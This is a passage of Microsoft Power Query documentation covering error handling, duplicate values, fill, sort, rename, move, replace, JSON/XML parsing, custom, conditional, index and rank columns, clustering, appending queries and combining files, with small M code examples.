Error message: The section directly after the reason. In the example above, the
error message is The column 'Column' of the table wasn't found.
Error detail: The section directly after the Details: string. In the example above, the
error detail is Column.
Example: You have a query from a text file that was located in drive D and created by
user A. User A shares the query with user B, who doesn't have access to drive D. When
this person tries to execute the query, they get a DataSource.Error because there's no
drive D in their environment.
Possible solutions: You can change the file path of the text file to a path that both users
have access to. As user B, you can change the file path to be a local copy of the same
text file. If the Edit settings button is available in the error pane, you can select it and
change the file path.
Example: You have a query from a text file where one of the column names was Column.
In your query, you have a step that renames that column to Date. But there was a
change in the original text file, and it no longer has a column heading with the name
Column because it was manually changed to Date. Power Query is unable to find a
column heading named Column, so it can't rename any columns. It displays the error
shown in the following image.
Possible solutions: There are multiple solutions for this case, but they all depend on
what you'd like to do. For this example, because the correct Date column header already
comes from your text file, you can just remove the step that renames the column. This
will allow your query to run without this error.
This error can have a number of causes, such as the data privacy levels between data
sources or the way that these data sources are being combined or merged. For more
information about how to diagnose this issue, go to Data privacy firewall.
Cell-level error
A cell-level error won't prevent the query from loading, but displays error values as Error
in the cell. Selecting the white space in the cell displays the error pane underneath the
data preview.
7 Note
The data profiling tools can help you more easily identify cell-level errors with the
column quality feature. More information: Data profiling tools
Remove errors
To remove rows with errors in Power Query, first select the column that contains errors.
On the Home tab, in the Reduce rows group, select Remove rows. From the drop-down
menu, select Remove errors.
The result of that operation will give you the table that you're looking for.
Replace errors
If instead of removing rows with errors, you want to replace the errors with a fixed value,
you can do so as well. To replace rows that have errors, first select the column that
contains errors. On the Transform tab, in the Any column group, select Replace values.
From the drop-down menu, select Replace errors.
In the Replace errors dialog box, enter the value 10 because you want to replace all
errors with the value 10.
The result of that operation will give you the table that you're looking for.
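The generated step is a call to Table.ReplaceErrorValues. The following is a minimal sketch, assuming a previous step named Source; the column name Sales is an assumption, and 10 is the replacement value from this example.

Power Query M
// Replace any error values in the Sales column with the value 10
= Table.ReplaceErrorValues(Source, {{"Sales", 10}})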
Keep errors
Power Query can serve as a good auditing tool to identify any rows with errors even if
you don't fix the errors. This is where Keep errors can be helpful. To keep rows that have
errors, first select the column that contains errors. On the Home tab, in the Reduce rows
group, select Keep rows. From the drop-down menu, select Keep errors.
The result of that operation will give you the table that you're looking for.
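Both the Remove errors and Keep errors operations have direct M equivalents. The following sketch shows the steps as they would appear inside a query's let expression, assuming a previous step named Source and an error-containing column named Sales (an assumption for illustration).

Power Query M
// Remove rows that contain an error in the Sales column
RemovedErrors = Table.RemoveRowsWithErrors(Source, {"Sales"}),
// Keep only the rows that contain an error in the Sales column
KeptErrors = Table.SelectRowsWithErrors(Source, {"Sales"})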
Data type conversion errors are commonly triggered when you change the data type of a
column in a table and some values found in the column can't be converted to the desired
data type.
Example: You have a query that includes a column named Sales. One cell in that column
has NA as a cell value, while the rest have whole numbers as values. You decide to
convert the data type of the column from text to whole number, but the cell with the
NA value causes an error.
Possible solutions: After identifying the row with the error, you can either modify the
data source to reflect the correct value rather than NA, or you can apply a Replace error
operation to provide a value for any NA values that cause an error.
Operation errors
When trying to apply an operation that isn't supported, such as multiplying a text value
by a numeric value, an error occurs.
Example: You want to create a custom column for your query by creating a text string
that contains the phrase "Total Sales: " concatenated with the value from the Sales
column. An error occurs because the concatenation operation only supports text
columns and not numeric ones.
Possible solutions: Before creating this custom column, change the data type of the
Sales column to be text.
When working with data that contains nested structured values (such as tables, lists, or
records), you may sometimes encounter the following error:
Expression.Error: We cannot return a value of type {value} in this context
Details: In the past we would have returned a text value of {value}, but we
now return this error. Please see https://go.microsoft.com/fwlink/?linkid=2099726 for more information.
These errors commonly occur for two reasons:
When the Data Privacy Firewall buffers a data source, nested non-scalar values are
automatically converted to errors.
When a column defined with the Any data type contains non-scalar values, such
values will be reported as errors during load (such as in a Workbook in Excel or the
data model in Power BI Desktop).
Possible solutions:
Remove the column that contains the error, or set a non-Any data type for such a
column.
Change the privacy levels of the data sources involved to one that allows them to
be combined without being buffered.
Flatten the tables before doing a merge to eliminate columns that contain nested
structured values (such as table, record, or list).
Working with duplicate values
Article • 12/17/2022
You can work with duplicate sets of values through transformations that can remove
duplicates from your data or filter your data to show duplicates only, so you can focus
on them.
2 Warning
Power Query is case-sensitive. When working with duplicate values, Power Query
considers the case of the text, which might lead to undesired results. As a
workaround, users can apply an uppercase or lowercase transform prior to
removing duplicates.
For this article, the examples use the following table with id, Category, and Total
columns.
Remove duplicates
One of the operations that you can perform is to remove duplicate values from your
table.
There's no guarantee that the first instance in a set of duplicates will be chosen
when duplicates are removed. To learn more about how to preserve sorting, go to
Preserve sort.
You have four rows that are duplicates. Your goal is to remove those duplicate rows so
there are only unique rows in your table. Select all columns from your table, and then
select Remove duplicates.
The result of that operation will give you the table that you're looking for.
In this example, the Category column contains duplicate values. You want to remove those
duplicates and keep only unique values. To remove duplicates from the Category column,
select it, and then select Remove duplicates.
The result of that operation will give you the table that you're looking for.
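In M, both variations of this operation use Table.Distinct. The following sketch shows the two steps as they would appear inside a query's let expression, assuming the previous step is named Source.

Power Query M
// Remove rows that are duplicated across every column
DistinctRows = Table.Distinct(Source),
// Remove duplicates considering only the Category column
DistinctCategories = Table.Distinct(Source, {"Category"})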
Keep duplicates
Another operation you can perform with duplicates is to keep only the duplicates found
in your table.
You have four rows that are duplicates. Your goal in this example is to keep only the
rows that are duplicated in your table. Select all the columns in your table, and then
select Keep duplicates.
The result of that operation will give you the table that you're looking for.
In this example, you have multiple duplicates and you want to keep only those
duplicates from your table. To keep duplicates from the id column, select the id column,
and then select Keep duplicates.
The result of that operation will give you the table that you're looking for.
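One way to express keep-duplicates in M (not necessarily the exact code the UI generates) is to count how often each key appears and then keep only the rows whose key appears more than once. The sample values below are made up for illustration.

Power Query M
let
    Source = #table(
        {"id", "Category", "Total"},
        {{1, "A", 20}, {1, "A", 20}, {2, "B", 30}, {3, "C", 40}}
    ),
    // Count how many times each id appears
    Counts = Table.Group(Source, {"id"}, {{"Count", each Table.RowCount(_), Int64.Type}}),
    // Collect the ids that appear more than once
    DuplicateIds = Table.SelectRows(Counts, each [Count] > 1)[id],
    // Keep only the rows whose id is duplicated
    KeptDuplicates = Table.SelectRows(Source, each List.Contains(DuplicateIds, [id]))
in
    KeptDuplicates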
See also
Data profiling tools
Fill values in a column
Article • 12/17/2022
You can use fill up and fill down to replace null values with the last non-empty value in a
column. For example, imagine the following table where you'd like to fill down in the
Date column and fill up in the Comments column.
Fill down
The fill down operation takes a column and traverses through the values in it to fill any
null values in the next rows until it finds a new value. This process continues on a row-
by-row basis until there are no more values in that column.
In the following example, you want to fill down on the Date column. To do that, you can
right-click to select the Date column, and then select Fill > Down.
The result of that operation will look like the following image.
Fill up
In the same way as the fill down operation, fill up works on a column. But by contrast, fill
up finds the last value of the column and fills any null values in the previous rows until it
finds a new value. Then the same process occurs for that value. This process continues
until there are no more values in that column.
In the following example, you want to fill the Comments column from the bottom up.
You'll notice that your Comments column doesn't have null values. Instead it has what
appears to be empty cells. Before you can do the fill up operation, you need to
transform those empty cells into null values: select the column, go to the Transform tab,
and then select Replace values.
In the Replace values dialog box, leave Value to find blank. For Replace with, enter null.
After all empty cells are replaced with null, select the Comments column, go to the
Transform tab, and then select Fill > Up.
The result of that operation will look like the following image.
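The following is a minimal, self-contained sketch of the whole sequence: replacing the empty cells with null, filling the Date column down, and filling the Comments column up. The sample values are made up for illustration.

Power Query M
let
    Source = #table(
        {"Date", "Comments"},
        {{"1/1/2020", ""}, {null, ""}, {null, "End of month"}, {"2/1/2020", ""}, {null, "End of month"}}
    ),
    // Turn the empty text cells into nulls so that fill up has values to act on
    ReplacedBlanks = Table.ReplaceValue(Source, "", null, Replacer.ReplaceValue, {"Comments"}),
    // Fill the Date column downward and the Comments column upward
    FilledDown = Table.FillDown(ReplacedBlanks, {"Date"}),
    FilledUp = Table.FillUp(FilledDown, {"Comments"})
in
    FilledUp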
Remove the Sales Person: values from the Sales Person column so you only get
the names of the salespeople.
Now you should have exactly the table you were looking for.
See also
Replace values
Sort columns
Article • 08/09/2023
You can sort a table in Power Query by one column or multiple columns. For example,
take the following table with the columns named Competition, Competitor, and
Position.
For this example, the goal is to sort this table by the Competition and Position fields in
ascending order.
When sorted using sort descending, an alphabetical column is sorted from Z to A.
To sort a table by using columns
To sort the table, first select the column to be sorted. After the column has been
selected, you can select the sort operation from one of two places:
On the Home tab, in the Sort group, there are icons to sort your column in either
ascending or descending order.
From the column heading drop-down menu. Next to the name of the column
there's a drop-down menu indicator. When you select the icon, you'll see the
option to sort the column.
In this example, first you need to sort the Competition column. You'll perform the
operation by using the buttons in the Sort group on the Home tab. This action creates a
new step in the Applied steps section named Sorted rows.
A visual indicator, displayed as an arrow pointing up, gets added to the Competition
drop-down menu icon to show that the column is being sorted in ascending order.
Now you'll sort the Position field in ascending order as well, but this time you'll use the
Position column heading drop-down menu.
Notice that this action doesn't create a new Sorted rows step, but modifies it to perform
both sort operations in one step. When you sort multiple columns, the order that the
columns are sorted in is based on the order the columns were selected in. A visual
indicator, displayed as a number to the left of the drop-down menu indicator, shows the
place each column occupies in the sort order.
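The single Sorted rows step for this example corresponds to one call to Table.Sort, assuming the previous step is named Source.

Power Query M
// Sort first by Competition, then by Position, both in ascending order
= Table.Sort(Source, {{"Competition", Order.Ascending}, {"Position", Order.Ascending}})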
To clear a sort operation from a column, select the down arrow next to the column
heading, and then select Clear sort.
To remove all sort operations, in Applied steps on the Query Settings pane, delete the
Sorted rows step.
Rename columns
Article • 12/17/2022
In Power Query, you can rename columns to format the dataset in a clear and concise
way.
Column 1 Column 2
Panama Panama
Canada Toronto
The column headers are Column 1 and Column 2, but you want to change those names
to more friendly names for your columns.
The end result that you want in Power Query looks like the following table.
There are a few ways to rename a column in Power Query:
Double-click the column header: The double-click action immediately lets you
rename the column.
Right-click the column of your choice: A contextual menu is displayed and you
can select the Rename option to rename the selected column.
Rename option in the Transform tab: In the Transform tab, under the Any column
group, select the Rename option.
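Whichever method you use, the generated step is a call to Table.RenameColumns. In this sketch, the previous step is assumed to be named Source, and the target names Country and City are assumptions for this sample table.

Power Query M
// Rename Column 1 and Column 2 to friendlier names
= Table.RenameColumns(Source, {{"Column 1", "Country"}, {"Column 2", "City"}})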
For example, for the first sample table provided in this article, imagine that you try to
rename both Column 1 and Column 2 to "Geography". An error message pops up that
prevents you from renaming the second column to "Geography".
Promoting your column headers from your first row: For example, if you tried
promoting the first row of the sample table in this article, Power Query renames
the columns to Panama and Panama_1.
7 Note
To learn more about how to promote headers from your first row, go
to Promote or demote column headers.
Expanding a column with a field name that also exists in the current table: This
can happen, for example, when you perform a merge operation and the column
with the merged table has field names that also exist in the table. When you try to
expand the fields from that column, Power Query automatically tries to
disambiguate to prevent Column Name Conflict errors.
Move columns
Article • 02/17/2023
A common task when preparing data is to move a column to a different place in the
dataset. To accomplish this move, you can either select the Move option or drag and drop the
column.
Move option
The following example shows the different ways of moving columns. This example
focuses on moving the Contact Name column.
You can move the column using the Move option, which is located in the Any column
group under the Transform tab. In the Move option, the available choices are:
Before
After
To beginning
To end
You can also find this option when you right-click a column.
If you want to move one column to the left, then select Before.
The new location of the column is now one column to the left of its original location.
If you want to move one column to the right, then select After.
The new location of the column is now one column to the right of its original location.
If you want to move the column to the far left of the dataset, then select To
beginning.
The new location of the column is now on the far left side of the table.
If you want to move the column to the far right of the dataset, then select To end.
The new location of the column is now on the far right side of the table.
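Behind the scenes, moving a column produces a Table.ReorderColumns step. The following sketch uses hypothetical column names for illustration; the list defines the complete new left-to-right order of the columns, and Source is assumed to be the previous step.

Power Query M
// Move Contact Name so it appears second in the table (column names are illustrative)
= Table.ReorderColumns(Source, {"ID", "Contact Name", "Country", "Total"})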
From there, you can specifically select the column you would like to view, which is
especially useful if there are many columns.
Replace values and errors
Article • 12/17/2022
With Power Query, you can replace one value with another value wherever that value is
found in a column. The Replace values command can be found:
On the cell shortcut menu. Right-click the cell to replace the selected value in the
column with another value.
On the Home tab, in the Transform group.
Replace entire cell contents: This is the default behavior for non-text columns,
where Power Query searches for and replaces the full contents of a cell. You can
enable this mode for text columns by selecting Advanced options, and then
selecting the Match entire cell contents check box.
Replace instances of a text string: This is the default behavior for text columns,
where Power Query will search for a specific text string in all rows of a column and
replace as many instances of the text string as it finds.
Advanced options are only available in columns of the Text data type. Within that set of
options is the Replace using special characters option.
Replace entire cell contents
Imagine a table like the following, where you have columns for Account ID, Category
Name, and Sales Goal.
The value of -1 in the Sales Goal column is an error in the source and needs to be
replaced with the standard sales goal defined by the business for these instances, which
is 250,000. To do that, right-click the -1 value, and then select Replace values. This action
will bring up the Replace values dialog box with Value to find set to -1. Now all you
need to do is enter 250000 in the Replace with box.
The outcome of that operation will give you the result that you're looking for.
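The generated step is a call to Table.ReplaceValue, assuming the previous step is named Source.

Power Query M
// Replace every -1 in the Sales Goal column with the standard goal of 250000
= Table.ReplaceValue(Source, -1, 250000, Replacer.ReplaceValue, {"Sales Goal"})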
In Power Query, you can parse the contents of a column with text strings by identifying
the contents as either a JSON or XML text string.
You can perform this parse operation by selecting the Parse button found inside the
following places in the Power Query Editor:
Transform tab—This button will transform the existing column by parsing its
contents.
Add column tab—This button will add a new column to the table parsing the
contents of the selected column.
For this article, you'll use the following sample table, which contains columns that you
need to parse:
SalesPerson—Contains unparsed JSON text strings with information about the
FirstName and LastName of the salesperson, as in the following example.
JSON
{
"id" : 249319,
"FirstName": "Lesa",
"LastName": "Byrd"
}
Country—Contains unparsed XML text strings with information about the Country
and the Division that the account has been assigned to, as in the following
example.
XML
<root>
<id>1</id>
<Country>USA</Country>
<Division>BI-3316</Division>
</root>
The goal is to parse the columns mentioned above and expand their contents to get this
output.
As JSON
Select the SalesPerson column. Then select JSON from the Parse dropdown menu inside
the Transform tab. These steps will transform the SalesPerson column from having text
strings to having Record values, as shown in the next image. You can select anywhere in
the whitespace inside the cell of the Record value to get a detailed preview of the
record contents at the bottom of the screen.
Select the expand icon next to the SalesPerson column header. From the expand
columns menu, select only the FirstName and LastName fields, as shown in the
following image.
The result of that operation will give you the following table.
As XML
Select the Country column. Then select the XML button from the Parse dropdown menu
inside the Transform tab. These steps will transform the Country column from having
text strings to having Table values as shown in the next image. You can select anywhere
in the whitespace inside the cell of the Table value to get a detailed preview of the
contents of the table at the bottom of the screen.
Select the expand icon next to the Country column header. From the expand columns
menu, select only the Country and Division fields, as shown in the following image.
You can define all the new columns as text columns. The result of that operation will
give you the output table that you're looking for.
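A minimal sketch of the equivalent steps on the Transform tab, as they would appear inside the query's let expression, assuming the previous step is named Source. The Add column variants would use Table.AddColumn with the same parsing functions instead.

Power Query M
// Parse the JSON text in SalesPerson into Record values
ParsedJson = Table.TransformColumns(Source, {{"SalesPerson", Json.Document}}),
// Parse the XML text in Country into Table values
ParsedXml = Table.TransformColumns(ParsedJson, {{"Country", Xml.Tables}})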
Add a column from examples
Article • 12/17/2022
When you add columns from examples, you can quickly and easily create new columns
that meet your needs. This is useful for the following situations:
You know the data you want in your new column, but you're not sure which
transformation, or collection of transformations, will get you there.
You already know which transformations you need, but you're not sure what to
select in the UI to make them happen.
You know all about the transformations you need by using a custom column
expression in the M language, but one or more of those transformations aren't
available in the UI.
The Column from examples command is located on the Add column tab, in the
General group.
In this example, your goal is to create two new columns:
Range: Create bins for the Monthly Income column in discrete increments of
5,000.
Full Name: Concatenate the Last Name and First Name columns to a single
column.
To do this, select the Monthly Income column, select the Column from examples
command, and then select From selection.
The preview pane displays a new, editable column where you can enter your examples.
For the first example, the value from the selected column is 19500. So in your new
column, enter the text 15000 to 20000, which is the bin where that value falls.
When Power Query finds a matching transformation, it fills the transformation results
into the remaining rows using light-colored text. You can also see the M formula text for
the transformation above the table preview.
After you select OK, you'll see your new column as part of your query. You'll also see a
new step added to your query.
To do this, select the Column from examples command, and then select From all
columns.
Now you'll enter your first Full Name example as Enders, Maria.
After you select OK, you'll see your new column as part of your query. You'll also see a
new step added to your query.
Your last step is to remove the First Name, Last Name, and Monthly Income columns.
Your final table now contains the Range and Full Name columns with all the data you
produced in the previous steps.
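For reference, one possible M formula for the Full Name column (not necessarily the exact formula Power Query generates from your examples) is shown below, assuming the previous step is named Source.

Power Query M
// Concatenate Last Name and First Name as "Last, First"
= Table.AddColumn(Source, "Full Name", each [Last Name] & ", " & [First Name], type text)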
Tips and considerations
When providing examples, Power Query offers a helpful list of available fields, values,
and suggested transformations for the selected columns. You can view this list by
selecting any cell of the new column.
It's important to note that the Column from examples experience works only on the top
100 rows of your data preview. You can apply steps before the Column from examples
step to create your own data sample. After the Column from examples column has
been created, you can delete those prior steps; the newly created column won't be
affected.
General
Conditional Column
Reference
Text transformations
7 Note
All Text transformations take into account the potential need to trim, clean, or apply
a case transformation to the column value.
Date transformations
Day
Day of Week
Day of Week Name
Day of Year
Month
Month Name
Quarter of Year
Week of Month
Week of Year
Year
Age
Start of Year
End of Year
Start of Month
End of Month
Start of Quarter
Days in Month
End of Quarter
Start of Week
End of Week
Day of Month
Start of Day
End of Day
Time transformations
Hour
Minute
Second
To Local Time
7 Note
All Date and Time transformations take into account the potential need to convert
the column value to Date, Time, or DateTime.
Number transformations
Absolute Value
Arccosine
Arcsine
Arctangent
Convert to Number
Cosine
Cube
Divide
Exponent
Factorial
Integer Divide
Is Even
Is Odd
Ln
Base-10 Logarithm
Modulo
Multiply
Round Down
Round Up
Sign
Sine
Square Root
Square
Subtract
Sum
Tangent
Bucketing/Ranges
Add an index column
Article • 12/17/2022
The Index column command adds a new column to the table with explicit position
values, and is usually created to support other transformation patterns.
By default, the starting index will start from the value 0 and have an increment of 1 per
row.
You can also configure the behavior of this step by selecting the Custom option and
configuring the starting index value and the increment.
For the example in this article, you start with the following table that has only one
column, but notice the data pattern in the column.
Let's say that your goal is to transform that table into the one shown in the following
image, with the columns Date, Account, and Sale.
In the Modulo dialog box, enter the number from which to find the remainder for each
value in the column. In this case, your pattern repeats itself every three rows, so you'll
enter 3.
The result of that operation will give you a new column named Modulo.
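The index and modulo steps correspond to the following M calls, shown as they would appear inside the query's let expression, assuming the previous step is named Source and the pattern repeats every three rows.

Power Query M
// Add a zero-based index that increments by 1 per row
AddedIndex = Table.AddIndexColumn(Source, "Index", 0, 1),
// Add the remainder of dividing the index by 3
AddedModulo = Table.AddColumn(AddedIndex, "Modulo", each Number.Mod([Index], 3), Int64.Type)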
Remove the Index column, because you no longer need it. Your table now looks like the
following image.
Step 4. Pivot a column
Your table now has three columns.
To achieve the table you want, you need to pivot the Modulo column by using the
values from Column1 where these values don't get aggregated. On the Transform tab,
select the Modulo column, and then select Pivot column from the Any column group.
In the Pivot column dialog box, select the Advanced option button. Make sure Value
column is set to Column1 and Aggregate values function is set to Don't aggregate.
The result of that operation will give you a table with four columns, as shown in the
following image.
After defining the correct data types for your columns, you'll create a table that looks
like the following table, with exactly the three columns that you needed and the shape
that you were looking for.
Add a custom column
Article • 12/17/2022
If you need more flexibility for adding new columns than the ones provided out of the
box in Power Query, you can create your own custom column using the Power Query M
formula language.
Imagine that you have a table with the following set of columns.
Using the Units, Unit Price, and Discount columns, you'd like to create two new
columns:
Total Sale before Discount: Calculated by multiplying the Units column times the
Unit Price column.
Total Sale after Discount: Calculated by multiplying the Total Sale before Discount
column by the net percentage value (one minus the discount value).
The goal is to create a table with new columns that contain the total sales before the
discount and the total sales after the discount.
On the Add column tab, select Custom column. The Custom column dialog box appears
with the following elements:
The initial name of your custom column in the New column name box. You can
rename this column.
A dropdown menu where you can select the data type for your new column.
An Available columns list on the right underneath the Data type selection.
A Custom column formula box where you can enter a Power Query M formula.
To add a new custom column, select a column from the Available columns list. Then,
select the Insert column button below the list to add it to the custom column formula.
You can also add a column to the formula by double-clicking it in the list. Alternatively,
you can write your own formula by using the Power Query M formula language in Custom column formula.
7 Note
If a syntax error occurs when you create your custom column, you'll see a yellow
warning icon, along with an error message and reason.
The result of that operation adds a new Total Sale before Discount column to your
table.
7 Note
If you're using Power Query Desktop, you'll notice that the Data type field isn't
available in Custom column. This means that you'll need to define a data type for
any custom columns after creating the columns. More information: Data types in
Power Query
The result of that operation adds a new Total Sale after Discount column to your table.
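The two custom columns from this example can be written as the following M steps inside the query's let expression, assuming the previous step is named Source.

Power Query M
// Total sale before applying the discount
TotalBefore = Table.AddColumn(Source, "Total Sale before Discount",
    each [Units] * [Unit Price], type number),
// Total sale after applying the discount (one minus the discount value)
TotalAfter = Table.AddColumn(TotalBefore, "Total Sale after Discount",
    each [Total Sale before Discount] * (1 - [Discount]), type number)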
The Custom column dialog box appears with the custom column formula you created.
7 Note
Depending on the formula you've used for your custom column, Power Query
changes the settings behavior of your step for a more simplified and native
experience. For this example, the Added custom step changed its behavior from a
standard custom column step to a Multiplication experience because the formula
from that step only multiplies the values from two columns.
Next steps
You can create a custom column in other ways, such as creating a column based on
examples you provide to Power Query Editor. More information: Add a column
from an example
For Power Query M reference information, go to Power Query M function
reference.
Add a conditional column
Article • 12/17/2022
With Power Query, you can create new columns whose values will be based on one or
more conditions applied to other columns in your table.
The Conditional column command is located on the Add column tab, in the General
group.
In this table, you have a field that gives you the CustomerGroup. You also have different
prices applicable to that customer in the Tier 1 Price, Tier 2 Price, and Tier 3 Price fields.
In this example, your goal is to create a new column with the name Final Price based on
the value found in the CustomerGroup field. If the value in the CustomerGroup field is
equal to 1, you'll want to use the value from the Tier 1 Price field; otherwise, you'll use
the value from the Tier 3 Price.
To add this conditional column, select Conditional column. In the Add conditional
column dialog box, you can define three sections numbered in the following image.
1. New column name: You can define the name of your new column. In this example,
you'll use the name Final Price.
2. Conditional clauses: Here you define your conditional clauses. You can add more
clauses by selecting Add clause. Each conditional clause will be tested in the order
shown in the dialog box, from top to bottom. Each clause has four parts:
Column name: In the drop-down list, select the column to use for the
conditional test. For this example, select CustomerGroup.
Operator: Select the type of test or operator for the conditional test. In this
example, the value from the CustomerGroup column has to be equal to 1, so
select equals.
Value: You can enter a value or select a column to be used for the conditional
test. For this example, enter 1.
Output: If the test is positive, the value entered here or the column selected
will be the output. For this example, if the CustomerGroup value is equal to 1,
your Output value should be the value from the Tier 1 Price column.
3. Final Else clause: If none of the clauses above yield a positive test, the output of
this operation will be the one defined here, as a manually entered value or a value
from a column. In this case, the output will be the value from the Tier 3 Price
column.
The result of that operation will give you a new Final Price column.
7 Note
New conditional columns won't have a data type defined. You can add a new step
to define a data type for this newly created column by following the steps
described in Data types in Power Query.
You can add more clauses to cover additional customer groups:
If the value from the CustomerGroup column is equal to 1, the Output will be the
value from the Tier 1 Price column.
If the value from the CustomerGroup column is equal to 2, the Output will be the
value from the Tier 2 Price column.
If none of the previous tests are positive, the Output will be the value from the Tier
3 Price column.
7 Note
At the end of each clause, you can select the ellipsis button (...) to delete, move up,
or move down the clause.
The result of that operation will give you the result that you're looking for.
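The conditional column for this example is equivalent to a Table.AddColumn step with an if expression, assuming the previous step is named Source.

Power Query M
// Final Price based on the customer group
= Table.AddColumn(Source, "Final Price", each
    if [CustomerGroup] = 1 then [Tier 1 Price]
    else if [CustomerGroup] = 2 then [Tier 2 Price]
    else [Tier 3 Price])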
Rank column (Preview)
Article • 07/30/2022
The Rank column command adds a new column to a table with the ranking defined by
one or more other columns from the table. A Rank method option can be used to
define how ties should be handled.
7 Note
Currently, the rank column feature is only available in Power Query Online.
Team Total Points Bonus modifier
A 20 0.5
B 30 0.8
C 40 0.2
D 10 0.45
E 20 0.75
The teams have shared a list of ways that they want to rank each other:
Using only the values from the Total Points field where higher values rank higher
using standard competition as the rank method
Using only the values from the Total Points field where higher values rank higher
using dense as the rank method
Ranking first by the Total Points and then by Bonus modifier where higher values
rank higher using the standard competition as rank method
1. With the original table already in Power Query, select the Total Points column.
Then from the Power Query Add column tab, select Rank column.
2. In Rank, Rank by will be the field selected ( Total Points ) and the Rank criteria will
be Higher value ranks higher.
3. By default, the rank method for this dialog is standard competition, so just select
OK. This action will give you a new step with the added Rank column.
1. With the original table already in Power Query, select the Total Points column.
Then from the Power Query Add column tab, select Rank column.
2. In Rank, Rank by will be the field selected ( Total Points ) and the Rank criteria will
be Higher value ranks higher.
3. Select Advanced at the top of the dialog box. This selection enables the advanced
section. In Rank method, change the value from Standard competition to Dense.
4. After selecting the rank method, select OK. This action will give you a new step
with the added Rank column.
2. The rank dialog appears with its advanced section open, with both fields selected
in the Rank by column. Total Points is in the first row and then Bonus modifier
below it. Both rows use the Rank criteria of Higher value ranks higher.
3. Make sure that Rank method at the bottom is set to Standard competition.
4. After verifying the above, select OK. This action will give you a new step with the
added Rank column.
Rank methods
A rank method establishes the strategy in which ties are handled by the ranking
algorithm. This option is only available in the advanced section of the Rank dialog.
The following table lists all three available rank methods and provides a description for
each.
Rank method Description
Standard competition Items that compare equally receive the same ranking number, and then a gap is left in the ranking numbers. For example, 1224.
Dense Items that compare equally receive the same ranking number, and the next items receive the immediately following ranking number. For example, 1223.
Ordinal All items receive distinct ordinal numbers, including items that compare equally. For example, 1234.
Cluster values
Article • 12/17/2022
Cluster values automatically creates groups with similar values by using a fuzzy matching
algorithm, and then maps each column's value to the best-matched group. This
transform is very useful when you're working with data that has many different
variations of the same value and you need to combine values into consistent groups.
Consider a sample table with an id column that contains a set of IDs and a Person
column containing a set of variously spelled and capitalized versions of the names
Miguel, Mike, William, and Bill.
In this example, the outcome you're looking for is a table with a new column that shows
the right groups of values from the Person column and not all the different variations of
the same words.
7 Note
The Cluster values feature is available only for Power Query Online.
In the Cluster values dialog box, confirm the column that you want to use to create the
clusters from, and enter the new name of the column. For this case, name this new
column Cluster.
The result of that operation yields the result shown in the next image.
7 Note
For each cluster of values, Power Query picks the most frequent instance from the
selected column as the "canonical" instance. If multiple instances occur with the
same frequency, Power Query picks the first one.
Similarity threshold (optional): This option indicates how similar two values must
be to be grouped together. The minimum setting of 0 causes all values to be
grouped together. The maximum setting of 1 only allows values that match exactly
to be grouped together. The default is 0.8.
Ignore case: When comparing text strings, case is ignored. This option is enabled
by default.
Group by combining text parts: The algorithm tries to combine text parts (such as
combining Micro and soft into Microsoft) to group values.
Show similarity scores: Shows similarity scores between the input values and
computed representative values after fuzzy clustering.
Transformation table (optional): You can select a transformation table that maps
values (such as mapping MSFT to Microsoft) to group them together.
For this example, a new transformation table with the name My transform table is used
to demonstrate how values can be mapped. This transformation table has two columns:
From (the value to look for) and To (the value to map it to).
It's important that the transformation table has the same columns and column
names as shown in the previous image (they have to be named "From" and "To"),
otherwise Power Query won't recognize this table as a transformation table, and no
transformation will take place.
Using the previously created query, double-click the Clustered values step, then in the
Cluster values dialog box, expand Fuzzy cluster options. Under Fuzzy cluster options,
enable the Show similarity scores option. For Transformation table (optional), select
the query that has the transform table.
After selecting your transformation table and enabling the Show similarity scores
option, select OK. The result of that operation will give you a table that contains the
same id and Person columns as the original table, but also includes two new columns
on the right called Cluster and Person_Cluster_Similarity. The Cluster column contains
the properly spelled and capitalized versions of the names Miguel for versions of Miguel
and Mike, and William for versions of Bill, Billy, and William. The
Person_Cluster_Similarity column contains the similarity scores for each of the names.
Append queries
Article • 12/17/2022
The append operation creates a single table by adding the contents of one or more
tables to another, and aggregates the column headers from the tables to create the
schema for the new table.
7 Note
When tables that don't have the same column headers are appended, all column
headers from all tables are appended to the resulting table. If one of the appended
tables doesn't have a column header from other tables, the resulting table shows
null values in the respective column, as shown in the previous image in columns C
and D.
You can find the Append queries command on the Home tab in the Combine group.
On the drop-down menu, you'll see two options:
Append queries displays the Append dialog box to add additional tables to the
current query.
Append queries as new displays the Append dialog box to create a new query by
appending multiple tables.
The append operation requires at least two tables. The Append dialog box has two
modes:
Two tables: Combine two table queries together. This mode is the default mode.
Three or more tables: Allow an arbitrary number of table queries to be combined.
7 Note
The tables will be appended in the order in which they're selected, starting with the
Primary table for the Two tables mode and from the primary table in the Tables to
append list for the Three or more tables mode.
To append these tables, first select the Online Sales table. On the Home tab, select
Append queries, which creates a new step in the Online Sales query. The Online Sales
table will be the primary table. The table to append to the primary table will be Store
Sales.
Power Query performs the append operation based on the names of the column
headers found on both tables, and not based on their relative position in the headers
sections of their respective tables. The final table will have all columns from all tables
appended.
In the event that one table doesn't have columns found in another table, null values will
appear in the corresponding column, as shown in the Referer column of the final query.
The new approach for this example is to select Append queries as new, and then in the
Append dialog box, select the Three or more tables option button. In the Available
table(s) list, select each table you want to append, and then select Add. After all the
tables you want appear in the Tables to append list, select OK.
After selecting OK, a new query will be created with all your tables appended.
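Appending produces a Table.Combine step that takes a list of tables. The sketch below uses the Online Sales and Store Sales queries from this example; any number of tables can be added to the list.

Power Query M
// Append Store Sales to Online Sales; the result has all columns from both tables
= Table.Combine({#"Online Sales", #"Store Sales"})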
Combine files overview
Article • 02/17/2023
With Power Query, you can combine multiple files that have the same schema into a
single logical table.
This feature is useful when you want to combine all the files you have in the same folder.
For example, if you have a folder that contains monthly files with all the purchase orders
for your company, you can combine these files to consolidate the orders into a single
view.
Files can come from a variety of sources, such as (but not limited to):
Local folders
SharePoint sites
Azure Blob storage
Azure Data Lake Storage (Gen1 and Gen2)
When working with these sources, you'll notice that they share the same table schema,
commonly referred to as the file system view. The following screenshot shows an
example of the file system view.
In the file system view, the Content column contains the binary representation of each
file.
7 Note
You can filter the list of files in the file system view by using any of the available
fields. It's good practice to filter this view to show only the files you need to
combine, for example by filtering fields such as Extension or Folder Path. More
information: Folder
Selecting any of the [Binary] values in the Content column automatically creates a series
of navigation steps to that specific file. Power Query will try to interpret the binary by
using one of the available connectors, such as Text/CSV, Excel, JSON, or XML.
Table preview
Combine files dialog box
Combined files output
Table preview
When you connect to a data source by using any of the previously mentioned
connectors, a table preview opens. If you're certain that you want to combine all the files
in the folder, select Combine in the lower-right corner of the screen.
Alternatively, you can select Transform data to access the Power Query Editor and
create a subset of the list of files (for example, by using filters on the folder path column
to only include files from a specific subfolder). Then combine files by selecting the
